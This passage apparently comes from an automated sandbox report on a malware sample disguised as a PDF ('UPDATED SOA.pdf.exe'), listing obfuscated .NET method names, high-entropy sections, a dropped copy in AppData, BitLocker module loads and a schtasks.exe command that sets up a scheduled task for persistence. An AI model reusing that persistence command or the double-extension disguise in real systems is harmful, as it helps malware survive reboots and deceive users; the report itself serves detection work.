                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D526650 pushfd ; ret 0_2_0D52665D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D522ACB pushfd ; retf 0_2_0D522AD1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D5FD8E0 pushfd ; ret 0_2_0D5FD8E1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_00403270 push eax; ret 9_2_00403272
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0040D346 push FFFFFF94h; ret 9_2_0040D34A
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0040D411 pushfd ; ret 9_2_0040D417
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_004125BD pushad ; iretd 9_2_004125C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_00415EA8 push D7BC1123h; iretd 9_2_00415EAE
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_00413F1B pushfd ; ret 9_2_00413F1C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0040D734 push edi; retf 9_2_0040D757
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0040BFEA push ds; iretd 9_2_0040BFEB
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C09AD push ecx; mov dword ptr [esp], ecx9_2_014C09B6
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014DC54D pushfd ; ret 13_2_014DC54E
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014DC54F push 8B014667h; ret 13_2_014DC554
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014DC9D7 push edi; ret 13_2_014DC9D9
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014909AD push ecx; mov dword ptr [esp], ecx13_2_014909B6
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_0146135E push eax; iretd 13_2_01461369
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_01461FEC push eax; iretd 13_2_01461FED
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014E7E99 push ecx; ret 13_2_014E7EAC
                Source: UPDATED SOA.pdf.exeStatic PE information: section name: .text entropy: 7.821519213749492
                Source: TKgtDXuaZu.exe.0.drStatic PE information: section name: .text entropy: 7.821519213749492
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, iPakx5358Dtp9WqUDQ.csHigh entropy of concatenated method names: 'TT8NTNcbAg', 'BeeNe3B7s9', 'jAXNaNoxKc', 'Y0aNOn6vL2', 'qbMNSpYQW4', 'iA5Ntdqnwa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, GTRcAicMmaVt1iH0N5T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wsfnSboqcV', 'aWwnNTmop0', 'Qf1n88FA85', 'bL2nngg13q', 'JnhnZ0rvn3', 'FTonWmDm8w', 'WNAnj6d9Ap'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, RUY7A4CLnyehuxIB6R.csHigh entropy of concatenated method names: 'X8owAXtFl2', 'GT5wyvyjew', 'ToString', 'XQYwhid7Dx', 'lDPwkjeE7X', 'oL6wTgHxJQ', 'ggCwe8k5Nj', 'GxMwamlqct', 'Tu3wOQY12D', 'K5Zwtm3nmj'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, pBfGW7zE5Ov4RUukCN.csHigh entropy of concatenated method names: 'mmCNKWs7KI', 'FrLNPTk4mL', 'HKyNINgaII', 'n99NdmFXd0', 'd4YNEDECAv', 'or5Nv03XtM', 'bWUNH1XUdS', 'Nm3NjgtPT5', 'krmN7pkEgE', 'tMBNLBeOSh'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, EmCDYLljRKu3jPp5Ga.csHigh entropy of concatenated method names: 'nC0Oh1eFNH', 'mZgOT3KSHc', 'UMnOaMfhVw', 'vCsa3aWL95', 'WH8azem2MO', 't85Oiw5wVj', 'BO0Oce4wmi', 'gKLOxtQIRh', 'pLFO2YPGcj', 'lnqOMSFpun'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, Mf8RdAccBp1l71Gq1eC.csHigh entropy of concatenated method names: 'dAoN3bxMDW', 'FrGNzblmgJ', 'Uj68iADXq3', 'ktK8cFtmAQ', 'Vm68x0P6HR', 'i6V82hZ0mH', 'NVj8MPg7lI', 'lKv8GKiErd', 'O6D8hwJMYq', 'enc8k1NSMC'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, tuutldr8wdf7Ua9PfW.csHigh entropy of concatenated method names: 'iymSdEN3QL', 'hBySE34Nxo', 'kBKSmnmVg0', 'wgySvSeUK8', 'ILiSHSsqps', 'rKpSV4PoiE', 'BR6Slpwo6X', 'eycSDLJV0h', 'IsaSUhsQSg', 'INRSqdU3UP'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, FBpaHu5sS4fMiby72Y.csHigh entropy of concatenated method names: 'm0MgP2sw3v', 'RmUgIHf0oY', 'jBqgdiCisp', 'G4QgEM0iwh', 'BoMgvruyuv', 'Hd8gH5wqhn', 'Vkygl27bEo', 'kDXgDwL9uo', 'wgUgqkVBlt', 'HUagbomQQq'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, Pw7oTDUcqoYSfmoP4R.csHigh entropy of concatenated method names: 'JtoO7yKRkb', 'Jj0OL48ep1', 'o2EO4pfJai', 'thPORVntE8', 'QIiOQEGY7Q', 'R8yOKR7UKb', 'aJCOXTkxZh', 'GoQOPfclJc', 'FCHOIVsjKi', 'LAgO9wAmGc'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, mXJIYA9mBDdG0WdVyo.csHigh entropy of concatenated method names: 'XrfeQ7v3mQ', 'RoFeXSpJpe', 'f7eTmthrK4', 'mDCTvISo7p', 'c6MTHPC5BR', 'OcmTVtoVJZ', 'BMsTlFPw9o', 'GcMTDoSDpn', 's73TUnFtd8', 'UBgTqvvolw'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, dGWfqbIBeroArsJvmI.csHigh entropy of concatenated method names: 'gGcTRsGK91', 'AOsTK6uiGb', 'moITPfg8XD', 'IXgTIAC9Y5', 'WHRTsDacXj', 'N8dTuOnOIR', 'l8lTwXYsx2', 'EOtTpUJk6S', 'tCXTS952Kb', 'c99TNxIwYu'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, hosoBXdMRlqPm8Y7ZT.csHigh entropy of concatenated method names: 'DUvaGehMnp', 'W4vakP1sKW', 'fEJaeWw9Et', 'vgQaOQuJXU', 'DFFaty6VT4', 'esAe6J4ZkC', 'Uo3e0tLQFy', 'c44eBijYGp', 'aTYeoWxqK6', 'eTxerWCsEE'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, Fyuu93MIaXTRyKvNh5.csHigh entropy of concatenated method names: 'nwFcOXVWZt', 'AtnctrRYoo', 'OBecAroArs', 'PvmcyIAXJI', 'wdVcsyoeos', 'XBXcuMRlqP', 'qFm5tVy6OgZxtVTkRS', 'BfHaB48BRCOrRVTb7n', 'MVicc1xLSc', 'G34c2W9x0j'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, WO7doLxcarN2ldPK6U.csHigh entropy of concatenated method names: 'rH34x0hIM', 'QgOR4DGYt', 'fVEK7nJ8w', 'OihXZvv6D', 'ipJIDHDJr', 'm3294CoVi', 'jb6JLkwKMtjebLZnNc', 'qO1GMjinlOFKGWnTjX', 'Ke3pAjPq8', 'cZpNTLsc6'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, RPFMkFkgbfwe2o9wi6.csHigh entropy of concatenated method names: 'Dispose', 'Ut7crOhjDL', 'gm7xEOBwKO', 'EkIlCNKalf', 'pnbc3KbIDn', 'rfUcz1LACP', 'ProcessDialogKey', 'md8xiuutld', 'twdxcf7Ua9', 'DfWxxaPakx'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, ep2LWmBlA6t7OhjDLu.csHigh entropy of concatenated method names: 'qBbSs7r8eK', 'BocSw577Zr', 'jqVSSt1ogZ', 'KSWS8c35p9', 'Q2rSZNpkTw', 'k2WSjPNqty', 'Dispose', 'itXphGa770', 'SDEpkD2VA4', 'DNBpTxH56K'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, gdCxZC0sUgLpwqtgwq.csHigh entropy of concatenated method names: 'PE2woqtZTJ', 'Ol2w3YR9ju', 'g9epiTOrnE', 'AWgpcb7c5T', 'bdHwbxjYlH', 'qA5wJL5Jgy', 'AlOw5RYdYk', 'ILuw1uIcQm', 'jfYwYxhHtd', 'LhewF5lyA0'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, MqnMP3ci2s4D7u6ZxXC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YgpNbRVbyK', 'CImNJTjMEx', 'HCHN5q0G3h', 'YBFN1dTI9H', 'J0oNYtMLex', 'QLVNFVvEf5', 'BfFNCG1jRV'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, SXVWZtPQtnrRYooVbS.csHigh entropy of concatenated method names: 't79k1GGHwH', 'Tc7kYaACny', 'mYhkFAwyf8', 'UvFkC15kKC', 'VUdk60iTN0', 'eLkk0dlctF', 'yl3kB3kmij', 'C5UkorPiC3', 'U0JkrjYmTx', 'jqQk3RIN0a'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, Tc8j1J1bPHFWciENiC.csHigh entropy of concatenated method names: 'pGhsqdlJYL', 'cqRsJFhjZJ', 'yVZs10Qipx', 'VoWsYGqxK6', 'fJXsEuXmya', 'aKvsm3sGxr', 'IKUsvdO7be', 'l7lsH75ehO', 'iSvsVuuZ0r', 'I3vslvw3gC'
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, DcEL2LtfcXFUOZVC4R.csHigh entropy of concatenated method names: 'BBX2G4ooRy', 'wuR2hjGgqw', 'rQE2kmGAby', 'PJU2TjJXck', 'B2n2eKlQBW', 'Qgw2aYe8DE', 'vV52O5xgGO', 'LR82trkrxP', 'HDG2fRZSq7', 'XPX2A7mqKW'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, iPakx5358Dtp9WqUDQ.csHigh entropy of concatenated method names: 'TT8NTNcbAg', 'BeeNe3B7s9', 'jAXNaNoxKc', 'Y0aNOn6vL2', 'qbMNSpYQW4', 'iA5Ntdqnwa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, GTRcAicMmaVt1iH0N5T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wsfnSboqcV', 'aWwnNTmop0', 'Qf1n88FA85', 'bL2nngg13q', 'JnhnZ0rvn3', 'FTonWmDm8w', 'WNAnj6d9Ap'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, RUY7A4CLnyehuxIB6R.csHigh entropy of concatenated method names: 'X8owAXtFl2', 'GT5wyvyjew', 'ToString', 'XQYwhid7Dx', 'lDPwkjeE7X', 'oL6wTgHxJQ', 'ggCwe8k5Nj', 'GxMwamlqct', 'Tu3wOQY12D', 'K5Zwtm3nmj'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, pBfGW7zE5Ov4RUukCN.csHigh entropy of concatenated method names: 'mmCNKWs7KI', 'FrLNPTk4mL', 'HKyNINgaII', 'n99NdmFXd0', 'd4YNEDECAv', 'or5Nv03XtM', 'bWUNH1XUdS', 'Nm3NjgtPT5', 'krmN7pkEgE', 'tMBNLBeOSh'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, EmCDYLljRKu3jPp5Ga.csHigh entropy of concatenated method names: 'nC0Oh1eFNH', 'mZgOT3KSHc', 'UMnOaMfhVw', 'vCsa3aWL95', 'WH8azem2MO', 't85Oiw5wVj', 'BO0Oce4wmi', 'gKLOxtQIRh', 'pLFO2YPGcj', 'lnqOMSFpun'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, Mf8RdAccBp1l71Gq1eC.csHigh entropy of concatenated method names: 'dAoN3bxMDW', 'FrGNzblmgJ', 'Uj68iADXq3', 'ktK8cFtmAQ', 'Vm68x0P6HR', 'i6V82hZ0mH', 'NVj8MPg7lI', 'lKv8GKiErd', 'O6D8hwJMYq', 'enc8k1NSMC'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, tuutldr8wdf7Ua9PfW.csHigh entropy of concatenated method names: 'iymSdEN3QL', 'hBySE34Nxo', 'kBKSmnmVg0', 'wgySvSeUK8', 'ILiSHSsqps', 'rKpSV4PoiE', 'BR6Slpwo6X', 'eycSDLJV0h', 'IsaSUhsQSg', 'INRSqdU3UP'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, FBpaHu5sS4fMiby72Y.csHigh entropy of concatenated method names: 'm0MgP2sw3v', 'RmUgIHf0oY', 'jBqgdiCisp', 'G4QgEM0iwh', 'BoMgvruyuv', 'Hd8gH5wqhn', 'Vkygl27bEo', 'kDXgDwL9uo', 'wgUgqkVBlt', 'HUagbomQQq'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, Pw7oTDUcqoYSfmoP4R.csHigh entropy of concatenated method names: 'JtoO7yKRkb', 'Jj0OL48ep1', 'o2EO4pfJai', 'thPORVntE8', 'QIiOQEGY7Q', 'R8yOKR7UKb', 'aJCOXTkxZh', 'GoQOPfclJc', 'FCHOIVsjKi', 'LAgO9wAmGc'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, mXJIYA9mBDdG0WdVyo.csHigh entropy of concatenated method names: 'XrfeQ7v3mQ', 'RoFeXSpJpe', 'f7eTmthrK4', 'mDCTvISo7p', 'c6MTHPC5BR', 'OcmTVtoVJZ', 'BMsTlFPw9o', 'GcMTDoSDpn', 's73TUnFtd8', 'UBgTqvvolw'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, dGWfqbIBeroArsJvmI.csHigh entropy of concatenated method names: 'gGcTRsGK91', 'AOsTK6uiGb', 'moITPfg8XD', 'IXgTIAC9Y5', 'WHRTsDacXj', 'N8dTuOnOIR', 'l8lTwXYsx2', 'EOtTpUJk6S', 'tCXTS952Kb', 'c99TNxIwYu'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, hosoBXdMRlqPm8Y7ZT.csHigh entropy of concatenated method names: 'DUvaGehMnp', 'W4vakP1sKW', 'fEJaeWw9Et', 'vgQaOQuJXU', 'DFFaty6VT4', 'esAe6J4ZkC', 'Uo3e0tLQFy', 'c44eBijYGp', 'aTYeoWxqK6', 'eTxerWCsEE'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, Fyuu93MIaXTRyKvNh5.csHigh entropy of concatenated method names: 'nwFcOXVWZt', 'AtnctrRYoo', 'OBecAroArs', 'PvmcyIAXJI', 'wdVcsyoeos', 'XBXcuMRlqP', 'qFm5tVy6OgZxtVTkRS', 'BfHaB48BRCOrRVTb7n', 'MVicc1xLSc', 'G34c2W9x0j'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, WO7doLxcarN2ldPK6U.csHigh entropy of concatenated method names: 'rH34x0hIM', 'QgOR4DGYt', 'fVEK7nJ8w', 'OihXZvv6D', 'ipJIDHDJr', 'm3294CoVi', 'jb6JLkwKMtjebLZnNc', 'qO1GMjinlOFKGWnTjX', 'Ke3pAjPq8', 'cZpNTLsc6'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, RPFMkFkgbfwe2o9wi6.csHigh entropy of concatenated method names: 'Dispose', 'Ut7crOhjDL', 'gm7xEOBwKO', 'EkIlCNKalf', 'pnbc3KbIDn', 'rfUcz1LACP', 'ProcessDialogKey', 'md8xiuutld', 'twdxcf7Ua9', 'DfWxxaPakx'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, ep2LWmBlA6t7OhjDLu.csHigh entropy of concatenated method names: 'qBbSs7r8eK', 'BocSw577Zr', 'jqVSSt1ogZ', 'KSWS8c35p9', 'Q2rSZNpkTw', 'k2WSjPNqty', 'Dispose', 'itXphGa770', 'SDEpkD2VA4', 'DNBpTxH56K'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, gdCxZC0sUgLpwqtgwq.csHigh entropy of concatenated method names: 'PE2woqtZTJ', 'Ol2w3YR9ju', 'g9epiTOrnE', 'AWgpcb7c5T', 'bdHwbxjYlH', 'qA5wJL5Jgy', 'AlOw5RYdYk', 'ILuw1uIcQm', 'jfYwYxhHtd', 'LhewF5lyA0'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, MqnMP3ci2s4D7u6ZxXC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YgpNbRVbyK', 'CImNJTjMEx', 'HCHN5q0G3h', 'YBFN1dTI9H', 'J0oNYtMLex', 'QLVNFVvEf5', 'BfFNCG1jRV'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, SXVWZtPQtnrRYooVbS.csHigh entropy of concatenated method names: 't79k1GGHwH', 'Tc7kYaACny', 'mYhkFAwyf8', 'UvFkC15kKC', 'VUdk60iTN0', 'eLkk0dlctF', 'yl3kB3kmij', 'C5UkorPiC3', 'U0JkrjYmTx', 'jqQk3RIN0a'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, Tc8j1J1bPHFWciENiC.csHigh entropy of concatenated method names: 'pGhsqdlJYL', 'cqRsJFhjZJ', 'yVZs10Qipx', 'VoWsYGqxK6', 'fJXsEuXmya', 'aKvsm3sGxr', 'IKUsvdO7be', 'l7lsH75ehO', 'iSvsVuuZ0r', 'I3vslvw3gC'
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, DcEL2LtfcXFUOZVC4R.csHigh entropy of concatenated method names: 'BBX2G4ooRy', 'wuR2hjGgqw', 'rQE2kmGAby', 'PJU2TjJXck', 'B2n2eKlQBW', 'Qgw2aYe8DE', 'vV52O5xgGO', 'LR82trkrxP', 'HDG2fRZSq7', 'XPX2A7mqKW'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, iPakx5358Dtp9WqUDQ.csHigh entropy of concatenated method names: 'TT8NTNcbAg', 'BeeNe3B7s9', 'jAXNaNoxKc', 'Y0aNOn6vL2', 'qbMNSpYQW4', 'iA5Ntdqnwa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, GTRcAicMmaVt1iH0N5T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wsfnSboqcV', 'aWwnNTmop0', 'Qf1n88FA85', 'bL2nngg13q', 'JnhnZ0rvn3', 'FTonWmDm8w', 'WNAnj6d9Ap'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, RUY7A4CLnyehuxIB6R.csHigh entropy of concatenated method names: 'X8owAXtFl2', 'GT5wyvyjew', 'ToString', 'XQYwhid7Dx', 'lDPwkjeE7X', 'oL6wTgHxJQ', 'ggCwe8k5Nj', 'GxMwamlqct', 'Tu3wOQY12D', 'K5Zwtm3nmj'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, pBfGW7zE5Ov4RUukCN.csHigh entropy of concatenated method names: 'mmCNKWs7KI', 'FrLNPTk4mL', 'HKyNINgaII', 'n99NdmFXd0', 'd4YNEDECAv', 'or5Nv03XtM', 'bWUNH1XUdS', 'Nm3NjgtPT5', 'krmN7pkEgE', 'tMBNLBeOSh'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, EmCDYLljRKu3jPp5Ga.csHigh entropy of concatenated method names: 'nC0Oh1eFNH', 'mZgOT3KSHc', 'UMnOaMfhVw', 'vCsa3aWL95', 'WH8azem2MO', 't85Oiw5wVj', 'BO0Oce4wmi', 'gKLOxtQIRh', 'pLFO2YPGcj', 'lnqOMSFpun'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, Mf8RdAccBp1l71Gq1eC.csHigh entropy of concatenated method names: 'dAoN3bxMDW', 'FrGNzblmgJ', 'Uj68iADXq3', 'ktK8cFtmAQ', 'Vm68x0P6HR', 'i6V82hZ0mH', 'NVj8MPg7lI', 'lKv8GKiErd', 'O6D8hwJMYq', 'enc8k1NSMC'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, tuutldr8wdf7Ua9PfW.csHigh entropy of concatenated method names: 'iymSdEN3QL', 'hBySE34Nxo', 'kBKSmnmVg0', 'wgySvSeUK8', 'ILiSHSsqps', 'rKpSV4PoiE', 'BR6Slpwo6X', 'eycSDLJV0h', 'IsaSUhsQSg', 'INRSqdU3UP'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, FBpaHu5sS4fMiby72Y.csHigh entropy of concatenated method names: 'm0MgP2sw3v', 'RmUgIHf0oY', 'jBqgdiCisp', 'G4QgEM0iwh', 'BoMgvruyuv', 'Hd8gH5wqhn', 'Vkygl27bEo', 'kDXgDwL9uo', 'wgUgqkVBlt', 'HUagbomQQq'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, Pw7oTDUcqoYSfmoP4R.csHigh entropy of concatenated method names: 'JtoO7yKRkb', 'Jj0OL48ep1', 'o2EO4pfJai', 'thPORVntE8', 'QIiOQEGY7Q', 'R8yOKR7UKb', 'aJCOXTkxZh', 'GoQOPfclJc', 'FCHOIVsjKi', 'LAgO9wAmGc'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, mXJIYA9mBDdG0WdVyo.csHigh entropy of concatenated method names: 'XrfeQ7v3mQ', 'RoFeXSpJpe', 'f7eTmthrK4', 'mDCTvISo7p', 'c6MTHPC5BR', 'OcmTVtoVJZ', 'BMsTlFPw9o', 'GcMTDoSDpn', 's73TUnFtd8', 'UBgTqvvolw'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, dGWfqbIBeroArsJvmI.csHigh entropy of concatenated method names: 'gGcTRsGK91', 'AOsTK6uiGb', 'moITPfg8XD', 'IXgTIAC9Y5', 'WHRTsDacXj', 'N8dTuOnOIR', 'l8lTwXYsx2', 'EOtTpUJk6S', 'tCXTS952Kb', 'c99TNxIwYu'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, hosoBXdMRlqPm8Y7ZT.csHigh entropy of concatenated method names: 'DUvaGehMnp', 'W4vakP1sKW', 'fEJaeWw9Et', 'vgQaOQuJXU', 'DFFaty6VT4', 'esAe6J4ZkC', 'Uo3e0tLQFy', 'c44eBijYGp', 'aTYeoWxqK6', 'eTxerWCsEE'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, Fyuu93MIaXTRyKvNh5.csHigh entropy of concatenated method names: 'nwFcOXVWZt', 'AtnctrRYoo', 'OBecAroArs', 'PvmcyIAXJI', 'wdVcsyoeos', 'XBXcuMRlqP', 'qFm5tVy6OgZxtVTkRS', 'BfHaB48BRCOrRVTb7n', 'MVicc1xLSc', 'G34c2W9x0j'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, WO7doLxcarN2ldPK6U.csHigh entropy of concatenated method names: 'rH34x0hIM', 'QgOR4DGYt', 'fVEK7nJ8w', 'OihXZvv6D', 'ipJIDHDJr', 'm3294CoVi', 'jb6JLkwKMtjebLZnNc', 'qO1GMjinlOFKGWnTjX', 'Ke3pAjPq8', 'cZpNTLsc6'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, RPFMkFkgbfwe2o9wi6.csHigh entropy of concatenated method names: 'Dispose', 'Ut7crOhjDL', 'gm7xEOBwKO', 'EkIlCNKalf', 'pnbc3KbIDn', 'rfUcz1LACP', 'ProcessDialogKey', 'md8xiuutld', 'twdxcf7Ua9', 'DfWxxaPakx'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, ep2LWmBlA6t7OhjDLu.csHigh entropy of concatenated method names: 'qBbSs7r8eK', 'BocSw577Zr', 'jqVSSt1ogZ', 'KSWS8c35p9', 'Q2rSZNpkTw', 'k2WSjPNqty', 'Dispose', 'itXphGa770', 'SDEpkD2VA4', 'DNBpTxH56K'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, gdCxZC0sUgLpwqtgwq.csHigh entropy of concatenated method names: 'PE2woqtZTJ', 'Ol2w3YR9ju', 'g9epiTOrnE', 'AWgpcb7c5T', 'bdHwbxjYlH', 'qA5wJL5Jgy', 'AlOw5RYdYk', 'ILuw1uIcQm', 'jfYwYxhHtd', 'LhewF5lyA0'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, MqnMP3ci2s4D7u6ZxXC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YgpNbRVbyK', 'CImNJTjMEx', 'HCHN5q0G3h', 'YBFN1dTI9H', 'J0oNYtMLex', 'QLVNFVvEf5', 'BfFNCG1jRV'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, SXVWZtPQtnrRYooVbS.csHigh entropy of concatenated method names: 't79k1GGHwH', 'Tc7kYaACny', 'mYhkFAwyf8', 'UvFkC15kKC', 'VUdk60iTN0', 'eLkk0dlctF', 'yl3kB3kmij', 'C5UkorPiC3', 'U0JkrjYmTx', 'jqQk3RIN0a'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, Tc8j1J1bPHFWciENiC.csHigh entropy of concatenated method names: 'pGhsqdlJYL', 'cqRsJFhjZJ', 'yVZs10Qipx', 'VoWsYGqxK6', 'fJXsEuXmya', 'aKvsm3sGxr', 'IKUsvdO7be', 'l7lsH75ehO', 'iSvsVuuZ0r', 'I3vslvw3gC'
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, DcEL2LtfcXFUOZVC4R.csHigh entropy of concatenated method names: 'BBX2G4ooRy', 'wuR2hjGgqw', 'rQE2kmGAby', 'PJU2TjJXck', 'B2n2eKlQBW', 'Qgw2aYe8DE', 'vV52O5xgGO', 'LR82trkrxP', 'HDG2fRZSq7', 'XPX2A7mqKW'
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile created: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpCB57.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
